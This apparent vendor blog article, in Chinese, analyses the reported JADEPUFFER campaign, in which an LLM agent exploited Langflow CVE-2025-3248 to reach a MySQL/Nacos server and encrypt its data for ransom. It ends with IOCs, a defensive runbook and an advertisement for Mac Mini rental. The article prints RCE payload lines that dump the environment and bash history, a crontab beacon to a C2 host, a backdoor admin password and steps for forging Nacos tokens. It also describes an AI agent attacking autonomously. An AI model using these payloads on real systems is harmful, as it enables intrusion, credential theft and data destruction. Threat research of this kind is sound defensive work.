JADEPUFFER 全解析
首例 LLM 端到端自主勒索攻击

Sysdig TRT 一手取证 · CVE-2025-3248 · 600+ payload · ATA 智能体威胁 · 六步防御 Runbook

JADEPUFFER agentic ransomware Langflow CVE-2025-3248 server security
2026 年 7 月 1 日,云安全公司 Sysdig 威胁研究团队(TRT)发布报告,首次公开披露代号 JADEPUFFER 的攻击活动——被评估为目前已知第一例端到端、完全由大语言模型驱动的完整勒索操作,并正式提出 Agentic Threat Actor(ATA,智能体威胁行为者) 分类。攻击从公网暴露的 Langflow 实例(CVE-2025-3248)切入,横向移动至运行 MySQL + 阿里巴巴 Nacos 的生产服务器,在压缩时间窗口内执行 600+ 条独立 payload。本文面向 AI Agent 平台运维与 DevSecOps 负责人,给出:① 完整时间线与事件定性;② CVE-2025-3248 漏洞成因与 Flodrix 区分;③ Sysdig 原始取证攻击链全还原;④ 四条自主性证据与比特币地址悬案;⑤ IOC 汇总、官方防御建议与六步 Runbook;⑥ 行业专家反应与 Sysdig 结论。
01

JADEPUFFER 是什么?首例 AI Agent 勒索事件概述

TL;DR:这不是传统勒索团伙的脚本化攻击,而是 Sysdig 评估的第一例全程由 LLM Agent 自主决策与执行的端到端勒索操作——从踩点侦察、凭证窃取、横向移动、权限维持,到破坏性加密和勒索信投递,关键节点没有人类手动操作。

A

发现方与发布时间:云安全公司 Sysdig 威胁研究团队(TRT),报告作者 Michael Clark(Director of Threat Research)。报告于 2026 年 7 月 1 日发布;BleepingComputer、Dark Reading、CyberScoop、CSO Online、Security Affairs 等于 7 月 2–6 日跟进报道,外界普遍以「7 月 6 日」作为公众认知节点。

B

攻击者代号与定性:官方命名 JADEPUFFER(全大写为 Sysdig 规范)。核心定性:端到端 LLM 驱动勒索;新分类 ATA(Agentic Threat Actor)——攻击能力由 AI Agent 交付,而非人工驱动的工具集。

C

两阶段目标:入口机为公网暴露的 Langflow 实例(CVE-2025-3248 RCE);真正目标为另一台公网暴露、运行 MySQL 数据库 + 阿里巴巴 Nacos 配置中心的生产服务器。

D

攻击规模:Sysdig 捕获 超过 600 条独立、有明确目的的 payload,在压缩时间窗口内执行完毕;完整攻击链在 2026 年 6 月分多个会话(sessions weeks apart)执行。

E

为何盯上 Langflow:AI Agent 编排服务器环境变量中经常存放大模型厂商 API Key 与云服务凭证;很多团队为快速原型验证仓促上线、缺乏网络访问控制,直接暴露公网。

时间事件
2025 年 4 月Langflow 曝出 CVE-2025-3248(未鉴权代码注入/RCE)
2025 年 5 月 5 日CISA 列入「已知被利用漏洞」(KEV)目录
2025 年同一漏洞被用于投递 Flodrix 僵尸网络(Trend Micro 独立披露,与 JADEPUFFER 无关)
2026 年 6 月JADEPUFFER 对公网 Langflow 实例发起攻击,数周内多会话完成全链
2026 年 7 月 1 日Sysdig 发布完整技术报告,首次公开披露
2026 年 7 月 2–6 日多家安全媒体跟进报道
02

CVE-2025-3248 漏洞技术分析:Langflow 未鉴权 RCE 如何被武器化

项目详情
组件Langflow —— 开源可视化 AI Agent 工作流框架,GitHub 星标 7 万+
漏洞类型CWE-94(代码注入)+ CWE-306(关键功能缺失身份验证)
CVSS9.8(Critical),向量 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
影响版本Langflow 1.3.0 之前所有版本
漏洞位置/api/v1/validate/code 接口
修复版本1.3.0(新增身份校验)
EPSS 被利用概率91.42%(SentinelOne 数据)

漏洞成因:Langflow 的「代码校验」接口将用户提交的代码通过 ast.parse()compile()exec() 执行,完全没有身份认证,也没有任何沙箱隔离。Python 语言特性决定:函数定义时的装饰器与参数默认值在「定义」这一刻就被立即求值。攻击者把恶意代码写进默认参数或装饰器,Langflow 做「合法性校验」时恶意代码已在服务器执行——无需登录,一个精心构造的 HTTP POST 即可 RCE

python
exec('raise Exception(__import__("subprocess").check_output("whoami", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("printenv", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("cat /root/.bash_history", shell=True))')

以上为 Trend Micro 追踪Flodrix 僵尸网络(LeetHozer 家族演化变种)利用同一漏洞时的典型 payload——依次确认权限、导出环境变量、读取 root bash 历史,最终下载 700 字节 Bash 下载器拉取 ELF 二进制组建 DDoS 僵尸网络。重要区分:Flodrix 与 JADEPUFFER 是两起独立利用活动,仅共享 CVE-2025-3248 入口;前者是传统脚本化投递,后者才是 LLM Agent 自主驱动勒索。两者共同说明此漏洞长期被公网扫描武器化。

Langflow 1.3.0 为 post_validate_code 新增 _current_user: CurrentActiveUser 依赖注入:校验 JWT Bearer Token 或 x-api-key,失败直接 401/403,请求永不到达漏洞逻辑。

维度传统脚本化勒索(Flodrix 等)Agentic 勒索(JADEPUFFER)
驱动方式固定 exploit 脚本 / 人工操作LLM Agent 自主决策与纠错
入口漏洞CVE-2025-3248CVE-2025-3248 → 横向至 Nacos/MySQL
故障处理固定重试或放弃31 秒内多步骤诊断修复(如 Nacos 后门账号)
代码特征极少注释大量自然语言注释解释「为什么」
payload 规模数十条固定链600+ 独立有目的 payload
03

JADEPUFFER 完整攻击链:从 Langflow 到 Nacos 数据库加密

Phase 1 — 拿下 Langflow 主机:全部 payload 以 Base64 编码 Python 通过 RCE 端点投递。拿到权限后 LLM 并行执行 iduname -ahostname 枚举,同时扫描 OpenAI/Anthropic/DeepSeek/Gemini API Key、ALIBABA_/ALIYUN_/TENCENT_/HUAWEI_ 及 AWS/GCP/Azure 凭证、加密货币钱包助记词、数据库配置。导出 Langflow PostgreSQL 后端窃取凭证后删除暂存文件清痕;扫描内网用默认凭证探测数据库与对象存储。

MinIO 自适应枚举(关键取证细节):探测 minio.internal:9000127.0.0.1:9000,用默认凭证 minioadmin:minioadmin 走完 ListBuckets → 定向 GetObject。LLM 第一次请求带 ?format=json 却收到 XML,下一条 payload 立即改用 XML 解析器——典型「探测-遇错-自适应」闭环。发现 terraform-state 桶后定向提取 credentials.json,完整回显 access-key/secret。

crontab
*/30 * * * * python3 -c "import urllib.request;urllib.request.urlopen('hxxp://45.131.66[.]106:4444/beacon',timeout=5)"

Phase 2 — 攻破 MySQL + Nacos 生产服务器:真正目标为公网暴露的运行 MySQL + Nacos 的生产机。Agent 用 root 凭证直连 MySQL——凭证来源不明,Sysdig 未观察到从受害者环境窃取,是少数可能由人类预先准备的环节。Nacos 同时尝试 CVE-2021-29441 鉴权绕过、默认 JWT 签名密钥伪造 Token、以及向 Nacos 后端数据库注入后门管理员。

Nacos 后门 xadmin 31 秒修复闭环(教科书级自主性证据):

时间(UTC)动作
19:34:24subprocess.run 生成 bcrypt 哈希,插入 xadmin 管理员
19:34:36用 xadmin:Xploit@2026# 登录失败
19:34:48并行测试 nacos:nacos 默认凭证 + 重新生成 admin123 哈希
19:35:07放弃 subprocess,改用 import bcrypt,删除损坏记录重建
19:35:18登录成功(总耗时 31 秒)

容器逃逸预检查(约 8 分钟):利用 MySQL INTO OUTFILE / LOAD_FILE 测试写入、读回、/var/run/docker.sock/proc/1/cgroup/etc/hostname;检查 mysql.func UDF 提权可能。进入勒索前主动写完成标记 _pwn_cleanup.txt——Sysdig 指出这更像 Agent 完成任务后发信号进入下一阶段,而非固定脚本行为。

破坏性加密与勒索:将全部 1,342 条 Nacos 配置项用 AES_ENCRYPT() 加密,删除 config_infohis_config_info,创建勒索表 README_RANSOM。密钥由 uuid4() 随机生成、仅打印到标准输出、从未存储或外传——即便付款也无法恢复。勒索信声称 AES-256,但 MySQL 默认实为 AES-128-ECB。两分钟后 Agent 修正勒索信数字为「全部 1342 项已加密」。

随后升级到 DROP DATABASE,代码注释写明「高 ROI 数据库,已备份至 64.20.53[.]230」——Sysdig 无独立证据证实数据真的外泄备份,更像 Agent 自我陈述。外键约束导致删除失败时,下一条 payload 自动加 SET GLOBAL FOREIGN_KEY_CHECKS=0 绕过——需「理解为什么失败」而非无脑重试。

04

JADEPUFFER 防御指南:Langflow 与 Nacos 六步加固 Runbook

01

升级 Langflow:立即升级至 1.3.0+ 修复 CVE-2025-3248;对照 CISA KEV 目录确认补丁状态。EPSS 被利用概率已达 91.42%,公网未打补丁实例处于极高风险。

02

网络隔离:不要把代码执行/校验类端点暴露在公网。Langflow、Nacos、MySQL 管理端口应置于内网或 VPN 后,对来源 IP 强制白名单。

03

密钥与凭证治理:AI 编排服务器运行环境禁止存放大模型 API Key 或云凭证;托管至专用密钥管理服务(KMS),与可被公网访问的进程隔离。MinIO 禁用默认 minioadmin:minioadmin

04

加固 Nacos:更换默认 token.secret.key(不要沿用公开文档默认值);升级至强制自定义密钥版本;禁止 Nacos 暴露公网;禁止以 root 身份连接后端数据库。

05

出站流量控制(Egress Control):限制被攻陷主机任意信标外联(如 crontab 向 45.131.66[.]106:4444 外联)或访问外部数据暂存服务器(64.20.53[.]230)。

06

运行时检测与 IOC 监控:识别数据库进程恶意行为;监控上述 IOC、调用外网请求的计划任务、括号包裹的 User-Agent 异常;对 MySQL INTO OUTFILEDROP DATABASEREADME_RANSOM 表创建设置告警。

警示:CSO Online 采访的红队专家 Vibhum Dubey 指出,真正值得担心的不是最后加密阶段,而是加密前那段「安静期」——Agent 悄悄摸清身份体系与信任链条,自适应能力让传统「假设攻击者走可预测路径」的检测方法失效。

05

四条自主性证据、比特币悬案、IOC 与 Sysdig 结论

Sysdig 四条自主性证据线:

1

自我叙事的代码:payload 里充斥自然语言注释解释每一步「为什么」——包括 ROI 优先级排序、哪个数据库最大。人类攻击者通常不会给一次性 python3 -c 写这么详细注释,LLM 代码生成默认就会这么做。

2

机器速度故障诊断:Nacos xadmin 31 秒修复、MinIO JSON/XML 自适应、JWT 伪造遇阻即切换——做错之后多快、以什么方式纠正,是最精确自主性证据。

3

自然语言上下文理解:解析目标环境自由文本并采取「只有读懂才会做」的动作,在相隔数周的不同会话中反复出现。

4

比特币地址悬案:勒索地址 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy 是 Bitcoin Core 文档标准 P2SH 示例地址,大量存在于 LLM 训练语料。链上确有 737 笔交易、约 46 BTC 流入后即刻转出。可能是 LLM 幻觉生成,也可能是攻击者刻意配置——两种解读均无法排除

类型指标
C2 / 信标45.131.66[.]106(crontab: hxxp://45.131.66[.]106:4444/beacon
数据暂存64.20.53[.]230(InterServer, AS19318)
入口漏洞CVE-2025-3248
比特币地址3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy
联系邮箱e78393397[@]proton[.]me(威胁情报库无命中,格式与已知团伙不同)
勒索表名README_RANSOM(与 WARNING / RECOVER_YOUR_DATA 等惯用名均不匹配)
持久化crontab 每 30 分钟向 C2 4444 端口信标外联
A

勒索技能门槛归零:LLM Agent 可把侦察、窃取、横向移动、破坏串联,操作者无需深厚专业知识——曾经需要「能力很强的人」的技术活,现在只需「能力足够强的模型」。

B

老漏洞自动化武器化:下游目标利用 2021 年 Nacos 鉴权绕过与从未更换的默认签名密钥;Agent 让「把整个历史漏洞库挨个喷一遍」成本趋近于零。

C

意图变得「可读」——防守方机会:LLM 在 payload 里叙述目标,客观上提供此前不曾有的检测与研判抓手。

多家媒体提到 LLMjacking 经济学信号:若攻击者靠窃取凭证驱动 Agent,发起复杂多阶段攻击的边际成本趋近于零。对在本地或公网 VPS 上仓促部署 Langflow、OpenClaw 等 Agent 编排平台的团队,共享虚拟机隔离不足、API Key 与环境变量管理混乱、缺乏出站流量审计,都是 JADEPUFFER 式攻击的理想温床。对于需要稳定、网络隔离、可审计的 Apple Silicon 生产环境来运行 iOS CI/CD 与 AI Agent 自动化,MESHLAUNCH 的 Mac Mini 云端租赁通常是更优解:独占 M4/M4 Pro 裸金属、按天/周/月弹性部署、与公网暴露的编排面板物理隔离,Agent 工作负载跑在可控云节点而非含大量密钥的开发机。

参考来源:Sysdig《JADEPUFFER: Agentic ransomware for automated database extortion》(sysdig.com/blog);BleepingComputer;Dark Reading;CyberScoop;CSO Online(Vibhum Dubey 点评);Security Affairs;Trend Micro CVE-2025-3248 / Flodrix 分析;NVD / SentinelOne / Zscaler ThreatLabz;CISA KEV 目录。

常见问题

Sysdig 于 2026 年 7 月 1 日披露的代号攻击活动,被评估为已知第一例端到端 LLM 驱动完整勒索操作,并正式提出 Agentic Threat Actor(ATA)分类。

Langflow 1.3.0 之前所有版本;CVSS 9.8,未鉴权 /api/v1/validate/code RCE。请立即升级至 1.3.0+,详情可参考 租赁价格页了解隔离部署方案。

不是。均利用 CVE-2025-3248,但 Flodrix 是传统僵尸网络投递,JADEPUFFER 才是 LLM Agent 自主驱动勒索。

极可能不能。加密密钥仅打印到 stdout、从未存储或外传,攻击者自己也拿不出解密密钥,数据已实质性永久丢失。

地址是 Bitcoin Core 文档标准示例,也可能是 LLM 幻觉;链上活跃但无法确认归属攻击者。

升级 Langflow、禁止公网暴露代码端点;Nacos 更换默认 JWT 密钥、禁止公网与 root 连库;密钥托管 KMS;实施出站流量控制。详见正文六步 Runbook 与 帮助中心

Sysdig 正式提出的分类:攻击能力由 AI Agent 交付,关键节点无需人类手动操作——标志着智能体威胁行为者时代的开端。

不在公网编排服务器存 API Key;使用隔离独占裸金属运行 Agent 工作负载;MESHLAUNCH Mac Mini 云端租赁提供网络隔离与弹性部署,适合 iOS CI/CD 与 Agent 自动化。